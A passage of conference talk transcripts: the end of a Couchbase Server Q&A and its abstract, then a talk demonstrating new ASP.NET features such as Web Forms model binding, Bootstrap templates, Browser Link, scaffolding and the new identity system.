somehow reference that document, you can't do joins or anything like that in no SQL database, but you can, with the same client, you can get to multiple documents within a bucket. So there's client affinity to a bucket. So if you create an instance of, like if you have five buckets, you're one going to create a lot of client resources. So it's per node per bucket, 10 connections per server. So that adds up quickly. But more importantly, there are things like indexers. So the thing that actually increments all those design documents or implement, that thing that actually indexes all those documents is happening per bucket. So a lot of those resources are expensive. So the general rule of thumb I always follow is if I would create a database for this in SQL server, I would create a bucket for it in CouchBase. With that type property. So again, it's that convention of including a type property or a doc type property or something. And that's kind of inherited from CouchDB where the same sort of general collection of just one thing existed. Yeah, you can, so there's some limits. When you set the bucket memory size, it has to be equal, there has to be basically the same amount of RAM on each node in the cluster because the sharding is distributed equally. So you can't have one bucket, one node can't have, so if you set it to three gigs, for example, all of your servers have to have three gigs available. So if you had like a 96 gig large instance on Amazon and you wanted to have that coupled with a small instance with 24 gigs or something, that wouldn't work. But you can upgrade all of the nodes. So you can have nested objects. There's no referential integrity. So generally the pattern is to store the ID of another document as a property of another document. 
You need to combine them manually. In that beer sample application I mentioned, I do walk through how you do master-detail — so it's a little tricky, but I actually walk through that in the developer article that I wrote. Like what? So the comment was that it looks like Lotus Notes. Damien Katz, who is the CTO of Couchbase and the creator of CouchDB, worked on Lotus Notes — so, no coincidence, I'm sure. Question? No — so, the question is about that first node you handshake with: generally you want to specify more than one node, so if that node isn't available, you can get to the next one. But once it connects to one node, it gets a list of all of the URIs, so if a node goes down, it knows how to get to the next one. Specifying several nodes in the config is generally the preferred approach, because the client maintains an internal list of nodes to connect to. Question? Yes — so, for large tables that are being queried in lots of different ways, would you move those over? You know, I think — so NoSQL actually refers to "not only SQL," and I think anyone at Couchbase or any NoSQL company would probably suggest that it's a complementary technology. SQL will always have a place, for things like data warehousing and for highly transactional systems. You can mimic sort of after-the-fact transactional behavior — do verifications after things are inserted and see if they went wrong — but I definitely think there's room for both. I don't think anyone's going to stop using SQL because of Couchbase, but they may stop using some of their SQL for Couchbase. Is performance one of the issues? Performance is definitely a big issue. Couchbase is probably — I mean, this is obviously a somewhat biased opinion — but it is generally considered probably the fastest NoSQL database out there. A good example of what we can achieve: LinkedIn, who I'm sure most people know of, has a four-node cluster doing 400,000 ops per second. Cisco, who has ridiculously fast hardware, has a five-node cluster doing one and a half million operations per second. You can't get that out of SQL Server — well, you could, but it would cost you a fortune. So for people who need to scale massively and easily and quickly — one of our biggest success stories is Draw Something. Does everyone remember that game, the little Pictionary app? It went from something like 3 million to 100 million users in a matter of weeks, and they scaled out on us. So scale is definitely our best story. We've spent a lot of time making sure that this thing will grow from one node to 100 nodes with no downtime, because you can add nodes and take nodes offline without your application having to go offline. Question? Yes — the replication story: you talked about how you could replicate between clusters, but can you replicate out to something else, like Elasticsearch or an ETL process? Oh yeah — so cross-data center replication is cluster to cluster; that is the standard. But because it's an open interface, you can actually implement other endpoints. The intra-cluster replication itself is really just: I have three nodes in a cluster.
I specify that two of them are replicas and one of them is a primary. So it just, it will replicate automatically for you. You could, yes. Yeah, so if you wanted to take, so a common use case is in the advertising industry, the online advertising industry, where people, they pull data into CouchBase, pump it out into Hadoop, do some analytics and pump it back into CouchBase. Any other questions? Thank you.
|
Couchbase Server 2.0 is an open source, distributed NoSQL database. It is a document-oriented data store with a key/value API. Couchbase features a map/reduce engine that allows for complex document indexing and querying. This talk will introduce development with Couchbase Server using the .NET Client Library. After a brief overview of server deployment and architecture, a detailed look at the key/value and document APIs will be covered. The discussion will conclude with a demonstration of using the code-first approach to building an ASP.NET MVC application with Couchbase.
|
10.5446/51447 (DOI)
|
Okay, all ready? Good morning. People have warned me about this stage and I'm feeling it. It's all wobbly up here. So if I just disappear, you'll know what happened. So we are going to be talking about BleedingEdgeASP.net. This is me. We have a podcast booth here at NDC and we're having a lot of fun with that. So let's dig right in. I'm going to be talking about just release stuff and stuff that's coming out soon. And when we've been talking about, hey, we've got another release, Visual Studio 2013, more ASP.net stuff, some people are kind of freaking out a little bit because they're like, you know, I'm barely keeping up with Visual Studio 2012, right? And they feel like, you know, they are getting eaten alive and they're just kind of worried. They feel like they're being chased and they just can't keep up, right? But what I want you to feel like instead is, you know how Google Chrome just kind of automatically updates and you get new goodness all the time? It's like, you know, you're just good things just keep coming and you're just enjoying yourself, right? So I want to, instead I want you to feel like with Visual Studio, you know, more frequent updates, with more frequent ASP.net updates that you're not getting in trouble, you're just gaining new powers. So, you know, you're just kind of leveling up and, you know, you can do more than you've been able to do before. All right, that's about all my funny pictures for today. I can't keep this rate up all day. So here's what I'm going to be talking about. What's new? BleedingEdge ASP.net. For me, that means what came out after ASP.net and Visual Studio, okay, so Visual Studio 2012 with ASP.net 4.5, MVC4, WebAPI1, so, you know, the big thing that came out last August. So we're going to start with that and then we're going to talk about what's coming out next. All right, so here's how, there's release notes that are up on the site for, you know, what came out in 2012.2. So let me back up for a second. How many people here are running Visual Studio 2012? Excellent. How many of you people have upgraded to Update 2? Okay, that's pretty good. It makes it easier when it keeps popping up with a little balloon, right? So if you haven't updated to that, I recommend you do. So if you've got that installed, you've got ASP.net 2012.2. So the idea is, you know, we used to have, like, Visual Studio 2005 and that had ASP.net 2.0 and then you wait a few years and giant books would get written about it and then Visual Studio 2008 came out and then you had ASP.net 3.5 and then you wait a few more years and a few more years. What they're doing now is, you know, big releases and then a lot of refresh updates on top of that. The nice thing with that is when you get a big release, a lot of it is just stuff that has been coming out over time anyways. So what was in the 2012.2 release that came out in February didn't change the ASP.net core. So that's really important to understand. If you, if I've got that installed, if I've got Visual Studio 2012.2 installed, I build an ASP.net site, I take advantage of all the cool new features, I zip up the project and I email it to you and you haven't got that installed, it'll all still work and you can deploy it to your server and that'll all still work, okay? So none of the core stuff changed. The things that did change are templates and tooling. So templates meaning when you do File New Project, what you see, what your project is set up with. And that mostly includes NuGet packages. 
So you'll see, when you do File New Project, if you watch the status bar you see all the NuGet packages being installed. It used to be that a project template was a very specialized thing, and now project templates are really kind of packaging up a lot of NuGet packages. So we've got new templates. We've got, you know, Web Forms; SignalR, which graduated from an open source project to a real shipping thing from Microsoft; and Web API, with a lot of updates — we saw a lot of people starting to use Web API when it was officially released last August, and they wanted a lot of features, so a lot of work has gone into Web API. And then with MVC, we got two new kinds of templates: single page application templates, with Ember and Knockout and all that kind of stuff, so it makes it easier to build single page apps, and then a Facebook template also. So then, to keep up with that, we've got tooling that works with all those features, right? And also just some cool new things. Again, like I was saying, Chrome updates every 15 minutes and there are new changes all the time, right? People are coming up with new languages and new libraries, so we've been updating the tooling in Visual Studio so that it's easier for you to take advantage of those things. Okay. I am going to point out something which is not going to sound super insanely cool, but it actually is. How many people here are doing Web Forms development? Okay, double that number, because I know there's a bunch of people that don't put their hands up. If you're doing Web Forms development, you've got to pay attention to this. I talk to people all the time; I keep bugging them and they say, yeah, yeah, actually I mostly do Web Forms, and then I'll ask them if they know about these features and they don't. So you're really missing out if you're not taking advantage. So we've got — this is a little hard to see; I guess I could zoom, but I'll just tell you, and trust me. The old way you used to do binding was you had data controls hooked up to some sort of data source — it might have been a control, or something you set in code-behind — and it was kind of wired up in a weird way, and then inside of your control you would set a bunch of things in quotes, and they were just strings. So you'd say, fill in this field with this property, and it was just a string, and if you misspell it, you don't know until you run the page, right? What we've done now is data controls have a model type. The model type is defined for that control, and once you do that, you can just say Item dot — you can data bind to Item.FirstName. That is strongly typed, and there are all kinds of great benefits that come out of that. One is, if you type it wrong, you're going to know right away — you get the red squiggly; I mean, it's not going to compile, right? Secondly, you get IntelliSense. So if it's a currency type, or if it's a DateTime, you can say Item.Date dot and then fill in the properties on it very easily. There are probably a bunch of other things, but those are enough, right? Those are good reasons to jump in. Now that we've got the control strongly typed, the control knows what it is binding to, and we can do some other cool stuff right on the control.
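Roughly, the markup and code-behind being shown on the slide look like this — the class names and data context are invented for illustration, and it jumps slightly ahead to include the SelectMethod that's described next:

```csharp
// Markup (sketch): a Repeater bound to a model type, getting its data from a select method.
//
//   <asp:Repeater runat="server" ItemType="MyApp.Models.Customer" SelectMethod="GetCustomers">
//     <ItemTemplate><%#: Item.FirstName %> <%#: Item.LastName %></ItemTemplate>
//   </asp:Repeater>
//
// Code-behind: the select method just returns IQueryable/IEnumerable. Nothing in it
// says "Web Forms", so the same data access could back an MVC action or a Web API controller.
using System.Linq;

public partial class Customers : System.Web.UI.Page
{
    private readonly MyDbContext _db = new MyDbContext(); // hypothetical EF context

    public IQueryable<Customer> GetCustomers()
    {
        return _db.Customers.OrderBy(c => c.LastName);
    }
}
```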
So this is repeater and instead of getting its data by, you know, on item data bound or any kind of other stuff, setting a data source property, we can say select method equals and we give it the name of a method. And the method just needs to return IQueryable or IEnumerable, okay? So we say repeater, get your data from get customers. And then get customers is this method down at the bottom. And what you'll notice about that, this is IQueryable and it's just returning some data. It could be pulling it from a service, from Entity Framework, from NHibernate, whatever, okay? The important thing is this bottom block of blurry text that you can't read, that says nothing about web forms. There's nothing in there. If you looked at it, you'd have no idea it's web forms. It means there's separation of concerns. You can share the data access methods and services, et cetera. So that is cool. Finally, oh, and then here you can also bind in those access methods, you can bind to control properties. Yes? Yeah? Yeah, so good question. So they work together. So here up at the top we've got repeater and then we've got item type equals blah, blah, blah, blah, blah, something.customer. And then we have select method equals get customers. Exactly. Yeah. So those two obviously need to match up, right? Okay. Then finally, when you're inserting data, since it's strongly typed, you've got a model, we're able to do the exact same type of data updates that you do in MVC. That includes TryUpdateModel, all the validation and all that stuff. So that means you don't have to say customer.firstname equals textbox, firstname.text, blah, blah, blah, and you don't have to do null checking and validation and all that. You can use all the same MVC update binding features. All right? I have to point that out because nobody does it, nobody knows about it and it's incredibly cool. One other cool thing that they bolted on top of that is now that everything's kind of strongly typed and everything works pretty close to how things do in MVC, we've got a friendly URL package that's included. So File New Project and web forms, if you've got the newest update and going forward, it's going to have this friendly URL package. That means if you've got an ASPX page, you can just browse to slash album, slash edit, slash one. You can have those same kind of URLs that you would have in, you know, an MVC app. So it's easy to just think, okay, that's neat, this is doing URL rewriting. It's actually doing a lot more. So I'm going to fall off this stage before this is over, so we'll keep watching. Okay, so this one here, I've got album edit one. This is actually binding on that. And so the method here, remember we're using a get method to populate that data. It's actually able to pass that value through from the URL down into the control itself and it pipes that along for you. Okay? So super easy to hook things up. When I do longer demos with this, I show it off and the coolest thing is there's almost no code. Everything just kind of maps together really cleanly. That's all, that's about all I'm talking about for web forms today, but I hope you paid attention for that part if you're using it. What we did with MVC was really, so, you know, there were a lot of like new core features in MVC4. And then in the 2012.2 release, what we did was build a bunch of templates that take advantage of those core features. And the way we did that was we set up, we changed the templating system.
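To pin down the strongly typed model binding pattern described above, here is a rough sketch of the code-behind side. The Customer model, the CustomersContext field and the page name are assumptions for illustration; the markup points at these methods with ItemType, SelectMethod and UpdateMethod attributes.

```csharp
using System.Linq;
using System.Web.UI;

public partial class Customers : Page
{
    // Assumed Entity Framework context; this could just as easily be NHibernate or a service call.
    private readonly CustomersContext _db = new CustomersContext();

    // Referenced from markup via SelectMethod="GetCustomers".
    // Nothing in here is Web Forms-specific - it just returns data.
    public IQueryable<Customer> GetCustomers()
    {
        return _db.Customers;
    }

    // Referenced via UpdateMethod="UpdateCustomer"; uses the same model binding MVC has.
    public void UpdateCustomer(int id)
    {
        var customer = _db.Customers.Find(id);
        if (customer == null) return;

        TryUpdateModel(customer);   // binds posted values onto the model, no manual copying
        if (ModelState.IsValid)
        {
            _db.SaveChanges();
        }
    }
}
```

The repeater markup would carry ItemType="...Customer" and SelectMethod="GetCustomers", which is what makes Item.FirstName strongly typed in the page.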
If you've ever tried to build a new file, a new project template, it's really hard. And it's actually still kind of hard, but it's a little easier. We went through and changed it so it uses VSIX packaging. It's a visual studio installer, or a visual studio, yeah, it's a visual studio installer. But it's basically just a zip file with a manifest. Okay? So a bunch of people have gone out and created other packages, community packages. So now it's very easy to set up, you know, use EmberJS, Angular, Breeze, Knockout, et cetera. Okay? Anyone using those? A few people? Okay, cool. All right. But you want new things, so let's talk about it. And let me check my time. One ASP.NET, I'm supposed to be there at around, I'm like right on the money. Okay, you've all heard people talking about One ASP.NET kind of for a while, right? Scott Hanselman's been doing this Lego blocks thing. You've seen this kind of diagram for a while. It takes a lot of work. So the idea is when you do File New Project, you're faced with a choice. You have to say, am I going to pick an MVC project? Am I going to pick web forms? Am I going to pick web API? You have to make that choice. Well, you can pick MVC because you can always just drop web forms into an MVC project pretty easily. But if you're mostly doing web forms, that's kind of a weird choice. And if you're doing mostly web forms, but you might want to add an MVC controller, that's hard. That's a world of pain. Anyone do that? I've done talks on it and everyone's just kind of like, what are you doing? That's crazy. And so, you know, and then we've got all these other Lego blocks in the middle and hooking them all together is, starts to get tricky. So what we've done is kind of broken that apart. So instead, you can kind of pick off a menu. You can say, I'd mostly like, you know, the web forms template, but I'd also like a little bit of web API and a little bit of MVC. Okay? So we're going to take a look at that. And this is early. This is keep John up very late at night because the bits don't always completely work early. So the dialogue that you'll see here is not beautiful yet. It's going to get better. But so we do, when you do File New Project, this is what you see. Okay? So we have got just web application. Now, you've also got portable class library and that's actually going to be out of there too. That's going to be removed. So when you do File New Web, you're going to get web application. All right? That's it. So if you still need to be able to go in and create the older templates that, you know, if you're relying on older templates, they're still there. But that's kind of a, you need to go look for that. Okay? So generally, let's create a new, we'll start with a web forms project, mostly web forms, right? So this is what this is going to look like now. So now we've got this choice here where we can say, okay, do we want to go empty, web forms, MVC, web API, single page, Facebook or mobile, right? But you can also say, all right, I would like mostly web forms, but I'm also going to throw in MVC and, you know, maybe web API. Now, the more I check off on here, the bigger my project gets. It pulls in more new packages. It does more configuration and all that. But it does set all that stuff up for you and it wires it together and they all play nicely. Okay? So this is actually kind of this alone, this was a huge effort. There were a lot of people working on this. ASP.NET was never really designed for this from the beginning.
I mean, there were modules and handlers and, you know, but mostly ASP.NET was kind of one thing, you know, and it kind of worked around web forms. And it's been this long process to move to, okay, you know, MVC kind of decouples a lot of things. And then as you see how things are working with web API and going forward, things are really kind of broken apart more. So this has taken a lot of work for the team to do this. Now, another thing in here is this configure authentication. So as I go through and set this up, all of them use the same authentication choices. So I can go and say, I can say, you know, no auth, I'll take care of it myself. No auth sounds kind of like OAuth, except nobody can log in. I'm not sure. Then you have individual, organizational, and Windows auth. So Windows auth is like, you know, your standard Windows auth. And then organizational, you can set up to authenticate, you know, with OAuth and things like that. So different providers. And again, this is all using the same identity stuff. So when you configure it for, you know, one of these projects and you've picked mostly web forms, but also some web API and MVC, they're all going to be working together with that same authentication. Does that make sense? All right. Checking on my time. Got lots packed in here. Okay, good. So then when I go through and click okay, it's your standard, you know, we'll create a project. So let us do that before I do that. Let me see. We'll unzoom and make you dizzy. I've got to kind of bounce between slides and demos for a bit because I want to keep you up with where we are at, but most of this is demo-wise. So we have changed the File New Project templates for all the, you know, all the new templates are using Bootstrap now. What we had in the past was our own kind of, you know, everything was Microsoft written. And so a lot of effort went into that. But the problem was it was its own kind of separate thing, right? So for instance, recently web forms. Remember how web forms used, or MVC used to be like the ugly blue background and it had kind of a white box on it. And then it got rounded corners in three, I think. And then in four, they put a lot of work and rewrote the whole template and it was responsive and it used kind of modern, more modern layout in CSS and it had a workable CSS reset in there. But it was still only Microsoft. So the problem is you can't really, there aren't a lot of resources out there just for like only MVC developers are writing MVC templates, right? And so there's not a way to take advantage of that whole ecosystem. So meanwhile, some guys, some folks on the Twitter team created something called Bootstrap. So who here's using Twitter Bootstrap? Okay, a lot of people, right? And it's, so it was Bootstrap, or it was Twitter Bootstrap and now those people have actually left Twitter and now it's just called Bootstrap. So I forget, so let me see Bootstrap. There it is. So what Bootstrap does for you is a few things. One, it gives, it has some, you know, kind of modern looking CSS. It has support for a lot of standard things that everyone has to implement themselves. For instance, if you go, it has things like headings and buttons and it can even get pretty complex with things like, say, progress bars, right? They have some animated progress bars and all kinds of things. They even have, well, they have badges, you know, colored badges. So things like that. Drop-down menus. Drop-down menus is great, right?
So, and that's something that takes a lot of work to do well, you know, and so here like button drop-downs is an example, right? That takes a good amount of work to do yourself and then you end up cobbling a lot of things together. You find a jQuery plugin to do one thing, you find something else. So this is kind of, this is a well-maintained, actively built project and there is also an ecosystem out there that's doing other themes because a complaint for a while was every bootstrap site looked like a bootstrap site. It's very kind of noticeable what the design is. So there are things like this. So this is BootsWatch and you can see on here, they all still kind of have, you know, kind of similar big, big areas, hero areas at the top. They call them and buttons and things, but they really do have kind of different looks, okay? So when we go in here, we're back into this. Let's create our web forms and MVC app. So it's going to spin up and add in a bootstrap and, you know, pre-configure all that for us. All that CSS is pulled in, JavaScript, et cetera. What's that? Yeah, there's one in here. There's a few bootstrap Metro ones I've been looking at. There's one in here that's called Cosmo that's decent, but there's some really nice ones. Yeah. So, okay, so this has set up for us a, you know, final new experience. So let's go ahead and run this. And I'll show you one thing that we can do. My default browser right now is Chrome. I kind of rotate through them all on a regular basis, right? So here I could say I would like to launch this with Chrome and, oops, I'm doing this wrong. There is a way to multi-select. There it is, Browse with. So I can go in and I'd say when I launch, I would like to launch it with Chrome and Firefox and IE, right? And I can set the browser size. I'll set them all to, you know, 480 by, or whatever it is, 684. Wow, that's nice. You know, sometimes when it does this, it's just playing with you. Like you say cancel, I don't know that one. It really did go down. How do you crash like launching the browser? That's crazy. Okay, let's pretend that didn't happen. Okay, so. I do not want to attach. Okay, so. We'll start. That's more fun if I launch a few browsers, but if it does that to us again, we'll just go with one. And again, this is like not released. These are nightly build kind of things. I'll do IE and Chrome. We'll just start with those two. Okay. Great. So this is spinning up two browsers for us and we can see, you know, that they're looking the same, which is nice. So one nice thing that Bootstrap does that you might not think about is they have a sensible CSS reset that kind of changes, it removes, it changes the padding and differences that browsers have between them. It's not as bad anymore, but it used to be, you know, pretty significant changes. So I'm going to go in and tile. I'll just stack these up. Because I want to show you a cool feature that you may not have seen yet. I'm hoping you have not seen yet. Okay, so we've got two browsers and we're working away. And one keeps popping up. We won't let that get us down. I'm about to close you browser. All right, you're done. There we go. All right. So I can go in and I can edit these. Now, I may want to go in and, you know, I could, I can make HTML changes, but I want to do something a little bigger. I actually want to replace our Bootstrap theme. So we're looking at this Bootstrap. So let's go pick a different one out. So there is that metro looking one. I'm actually going to go with this one here. It's Amelia. 
Just because it looks, you know, significantly different. Actually, there's an even, there's a darker one here. Superhero. I'm feeling superhero today. Okay, good. So, see if I can mess this up. Superhero download. Okay, so I'm downloading that CSS. Now, the way everything's implemented, it's all CSS driven for the whole site, right? So I can pick that and just completely replace this CSS. Now, this is kind of, you know, how you do for a demo. I would change this. I would use bundling and I would hook it up that way. But I just want to show you quickly what this is able to do. So, we've got our browser here and then we've got IE over here and I'm going to shrink that back down. Go there. Okay. So now I want to save that CSS and I'm going to do reload. So do you see what happened there? I clicked this little reload button in the toolbar in Visual Studio and it refreshed both connected browsers. Okay. Which is pretty useful. What we shipped with Visual Studio 2012 was Page Inspector and Page Inspector has been getting a lot of like live update things. But this is actually updating multiple connected browsers as we type. Okay. So now I'll go in and I will, let's change that default page. We'll change some of that text on there. Right. So here it says ASP.net. I will say is neat. Okay. And I'm going to save with, I'm going to do control alt enter. Now, this will actually work across different things. We could connect, you know, mobile emulator. We could actually, anything that's connected to this, we'll get those updates. And the reason is Visual Studio is actually injecting using, it's injecting JavaScript that runs a SignalR hub. So we'll briefly talk about SignalR later. But this is, SignalR is important because it's not just one way communication, right? That would be good enough if it was just one way. But this is actually two way communication between the browser and Visual Studio. So we've done kind of the obvious thing first, which is push updates from Visual Studio out to the browser. But imagine a Visual Studio can watch what your browser is doing and say, hey, this page is taking too long to load or, you know, we've got a conflict in your JavaScript or whatever. It can monitor that. Right. Pretty cool. Come on. That's cool. If that's not cool, I'm done because okay. So there we are with our bootstrap. One other thing I want to show you with bootstrap is I have got the, actually, I'm going to go back to, okay. There I've gone back. But my page is blank because I've deleted everything. So I'm going to throw in, let me see, a button group. And it's going to have a button. Now this is too small. Let me zoom it up. But in primary. So what I'm typing in here is Zen code and I'm using bootstrap classes. And I'm going to, I can put in content with Zen coding. Okay. So I'm going to say, you know, monkey. Whenever, I don't know what word you use when you're coding, but if I just need a word, that's usually I'll use monkey. Okay. So now I hit tab. And what that did is Zen coding, and Zen coding actually pulled in using Visual Studio Web Essentials extension. So, but Zen coding lets you type CSS selector syntax, and it will then expand out to the HTML that would match that. And so then I can go and when I refresh this, it should update. And if it doesn't, we'll just pretend like it did. That's what I get. When I did this earlier, oh, it's not running now. When I did this earlier, I was, I was practicing this with MVC. So, but okay. So there I got a row of buttons. 
And I can, I can do all kinds of other things with this. So for instance, I'll do one more. I'll do pagination. So I'll do, so let me make this bigger. So what I'm doing here is these are descend these, these are child selectors. So I'm saying I want a pagination div. And inside that I want a UL. And inside that I want list items. And inside, and I want 10 list items. So li times 10. And inside that I want an anchor tag. And inside that anchor tag, I want to say item. And here I put the dollar sign. And so that dollar sign is the, the thing that's going in. And actually, I would like it to look a little better. So I'm going to put this inside a div that's hero unit. Okay, hero unit is what they use kind of for that box up at the top. So now I do that, I hit tab to expand it. Okay. So now there's that. Now if I hit control, all enter. That should update my connected browsers. Missing bootstrap CSS. Yeah, but that should be in the, oh yeah, you're right. But still that should be in the master page. That's what I get for skipping, skipping to the different one. Stay tuned because we'll be showing more of that later. Actually, I'll come back to this if I get time. The point that I want to show with this is that assuming you don't do something stupid like I just said, it's very easy to take advantage of all those selectors and do quite a bit. So let me get back to the bootstrap thing that I was showing. So the idea is that it's not just, at first I was kind of like so, so on bootstrap, I'll be honest. I thought that it was neat, but I didn't always like the way it looked. And then the themes kind of make up for that sum. But I still wasn't completely sure. But what's really kind of made me think that it's more useful is I can use kind of standard, I can use standard, you know, things for pagination, for instance. Some of these things that are take a while to set up. So you can use these components and use standard kind of sensible styles, CSS styles. Okay? Questions on that? That make sense? Okay. I would love to mess with this more, but I need to go on because I want to show you scaffolding. So what we've had in the past with scaffolding was kind of a mishmash. So we had, let me see if I can take this all the way back. That's what I should have done. Okay. So what we had in the past with, actually, oh well. What we had in the past with scaffolding was nothing for web forms. MVC had its own scaffolding. You could right click and scaffold around a controller. Web API had its own different kind of thing. We had some kind of extensibility for MVC. When we're looking at that with the whole idea of what can we do better with this one ASP.NET thing, we thought scaffolding was important. And in doing that, we wanted to do it right for all of these. So I'm going to stop this. I'm going to create a quick model. We'll take a look at that real quick. Okay. So I'm going to create a, you'll notice, File New Project, Web Forms application has a models folder. And, you know, that's handy for what I'm doing now, but it's also handy for what I showed you earlier with the strongly typed controls. Okay. So I'm going to create a person class. And how big do I have to zoom it for it to be readable? Is that good? Good. Okay. So now let's give this person a, you know, standard things. We'll give them an ID. We'll give them a, and we'll give them, what else? I guess an age. Okay. So standard kind of stuff. So now I'm going to right click in here and I'll say add what we've got in this. Let's see if I can zoom in. 
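The model class being put together here is just a plain C# class along these lines; only an ID and an age are actually called out in the talk, so the third property and the namespace are assumptions:

```csharp
namespace WebFormsDemo.Models   // the project's Models folder; the namespace name is an assumption
{
    public class Person
    {
        public int Id { get; set; }
        public string Name { get; set; }   // assumed third property
        public int Age { get; set; }
    }
}
```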
So there we've got scaffold, right? And so scaffold is kind of the standard thing that we're using for all of them. So it's not, you know, add, add controller, add this, add that. It's always add scaffold. So when I right click, I say right click add. Bring up my scaffolding dialogue. So now this dialogue, remember this is the whole one ASP.net thing. I can scaffold anything into this project. So I can scaffold, we've got all our standard MVC scaffolders. I could, you know, scaffold an MVC controller. And I can do an empty one or with any framework, all that stuff. But I can also do, down at the bottom, I've got web forms and I've got, I've got web API in the list too. So here I'm going to say add web forms. So this is similar to the, you know, to what we did. Did I build, there we go, person? Okay. So I'm just going through. I've selected my model classes person. I'm going to create a new entity context. I'm going to generate mobile views as well. And I will say add. So now it has me create a new context. So that's creating an entity framework context. You can use anything you want to get your data. I'm just showing that, you know, it works well with any, any framework. So there's an error. Okay. So some that might be because I haven't built. That's always what it is for me and MVC. We'll try that again. Add. That's over there. Okay, here we go. On the plus side, we've already got our entity context. So it's going to be that much faster. Where is it? I'll just create a new one. They're cheap. Okay. So, and I'm also generating mobile views. Let's see if this works. There we go. Okay. So this is going through and it's, you know, building out pages. So the same way that it would build out if this was MVC, it would build a controller and views. This is building out pages for me. So you can see on the right side, we've got all those pages. And these pages are pretty smartly done. These are actually taking advantage of dynamic data. So that's another one of these things. A long time ago, when everything was not one ASP.net, everything was all split up, we had dynamic data. Did anyone use, anyone here use dynamic data? Anyone use a few people? People that have used or do use dynamic data really like it. It's pretty powerful. You can point it at, you know, a data source and it scaffolds everything up and it does all kinds of great stuff by just inspecting your data. So this is leveraging that. Okay. So one nice feature of that dynamic data is actually that it's got these templates, field templates and entity templates. Now, if you look at these, these are going to seem pretty familiar to the kind of display templates you've got in MVC. And that's because MVC actually stole them from dynamic data a while ago. Okay. So this means you can go in and in your scaffolding, you can, you can, you can scaffold, you can change the way things are displayed. You can say every time there's a string, every time there's an image, I would like an alt tag, I would like whatever. Okay. So that's it for scaffolding. One other thing I do want to show is that we also have mobile in here somewhere. We've got mobile views. And we've got a view switcher. So that makes it so you can, you know, the person can say, thanks for the mobile view, but I'd actually like to see the desktop one and it'll cleanly switch back to that. Okay. So we are at scaffolding. Now I need to hurry on to identity. So I'm thinking, we've been doing web forms all this time. I think I'm going to switch over to a new MVC application. 
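For reference, the "new entity context" the scaffolder creates is essentially just an Entity Framework DbContext; a minimal sketch, with the class and set names assumed:

```csharp
using System.Data.Entity;
using WebFormsDemo.Models;

public class PersonContext : DbContext
{
    // The scaffolded pages (and the select/update methods they generate) talk to this set.
    public DbSet<Person> People { get; set; }
}
```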
So we'll close solution. We'll get a new one. So again, identity is one of these things that we've kind of, we've had what we've had for a long time. We had the identity system that's been around for, in web forms, I'm not sure, I'm not even sure when that, I guess that was ASP.NET 2.0 when that came out. So, so we, yeah, so we've had this identity system and it solved cases that really made sense back around 2005. You know, when you had users and they all had roles. And so you have these five users or administrators and everyone else is a standard user and everyone else is not authenticated. Right. But over time, that doesn't fit with things like OAuth, where we need to track different things about our user. Users don't have passwords when you're using OAuth. Users have claims. And now also ASP.net or .NET 4.5 itself is wired for claims. So Dominic explained this to me the other day, roles are just kind of yes or no. Is this user in a role? Yes or no. But a claim can do a lot more. Claim can be what is this user's email address? Claim can be, you know, any, it can be, you can think of it as a value instead of just a yes or no. So there's all these things that we would like identity to be able to do and, and, you know, the framework supports it and, and the web, people are using it, but it wasn't set up yet in ASP.net. Well, in, we had, we had a new simple membership provider that we shipped with the last kind of wave of stuff. And it did simplify some things, but there were, there were still problems you could run into. For instance, it, you know, it wasn't completely testable. It wasn't very extensible. You could, you could use it to save additional information about your user, but you couldn't hook it up with other kind of providers. You couldn't change too much about how it worked. So we've, we've got what we think is, you know, kind of the identity system that we can use across all of these, you know, across Web API and MVC, you know, across the whole gamut. And it's, it's extensible and it's testable and it's kind of put a lot of effort into engineering something that is, you know, very future-proof and easy to work with. Okay. So I'm going to create an MVC app, create, I'll configure authentication. So I'm going to say individual user account. It's a new laptop for me and I'm not sure what it's doing. Okay. So I click okay and nothing happens. All right. I'll just do that. Okay. So, so now it's going through and it's wiring everything up. I can talk more while it's installing all the new packages and stuff. One other thing that, that's different about the identity system is it's wired up using OWIN. So OWIN is the Open Web Interface for .NET. We'll talk a little bit more about that later given time. But it's kind of wired up in a way that is not even strictly coupled to ASP.NET. So that means you could use, use this identity system, you know, it works very well with ASP.NET. It's designed to work well with ASP.NET. But it's also designed so that you could take it and use it with Nancy or ServiceStack or anything else, right? So it's, it's kind of loosely coupled now. It's not wired in so deeply to ASP.NET. So what I want to show you with this is we've got an identity model. The identity model is what defines our user. And what's nice with this is that this is set up in, you know, it's a plain old CLR object. And so it can be managed by Entity Framework. So this is another one of those things.
Given time, I do a different demo where I go through and use Entity Framework migrations and keep changing my user and keep migrating the data along with that, which is something that would be very, very hard to do with our older systems. So here I've got, you know, an ID and a username. I'm going to throw a few other properties on them. So let's give them a, just an age, I guess. Nickname first. Okay. So in the past, if you wanted to bolt additional properties onto a user, it was, it was not very easy. We gave you, like, you know, kind of a blob of, blob string you could throw things onto. Or a lot of time people just said that's too hard and they had a separate database and they wired them together by tracking the IDs. Simple membership gave you some opportunities to extend things, but it kind of, it was kind of wired in specific ways. So what this is doing, this is saving these. This is going to, you know, build up a user database for me using the user's properties. So I'm going to hit F5. And you're going to register a user and then we'll see what happens to them. Now notice this. This is what this looks. This is, you know, our site when it's at this size. Now when I make it bigger, so it went to a full screen view. So this is this responsive layout. This is the kind of thing that makes your app look good on a mobile phone and good on desktop without you having to work hard. Okay. So now let's register a user. So we will register Freddy. Freddy. And his password is not telling. Okay. But it was spaghetti. Okay. So I just hit register. Now as it's doing that, let's go over and view all our files. So here's the database that's been created. And actually, I didn't do everything that I needed to do. So you'll get to see how I fix the problem. Yeah, actually, okay. So there it is username and nickname and stuff. Now normally what I would do is I could go into however that user is created. So I would go into the account controller and I could say on create account, you know, we actually want to fill in a nickname and pull it out of something. Right. So if I go into register, this is where I would set like the age and nickname. But what it did was it said, well, those are empty, but I'm going to create those fields for you. So if we look at what's in our database. So there we have those fields. Okay. And this is something where we can do all migrations. We can, you know, we can treat it like it's code accessing data. It's not this weird kind of thing that's kind of away from us. All right. There's a lot more to it. And there's a lot more future plans to make it, you know, more extensible, make it so that you can bolt things on, et cetera. But it's been designed from the beginning that it's very pluggable. One other thing I want to show is what I'd mentioned with the way that it's configured. So if we go into App_Start, here we have Startup.Auth. And so Startup.Auth has, you know, the things where it wires everything together. And, okay. So this is, this has a lot of stuff you can uncomment if you want to do more. But this is really all there is to it. What's different about this, though, is there's nowhere in the application where it's, you know, it's calling out to this. This is actually using the OWIN system. So it's got this IAppBuilder. So actually, depending on time, let me see, 11.05, okay, 15 minutes. I'm going to run through a few things and then hopefully get back to that OWIN because that's my favorite demo. Okay.
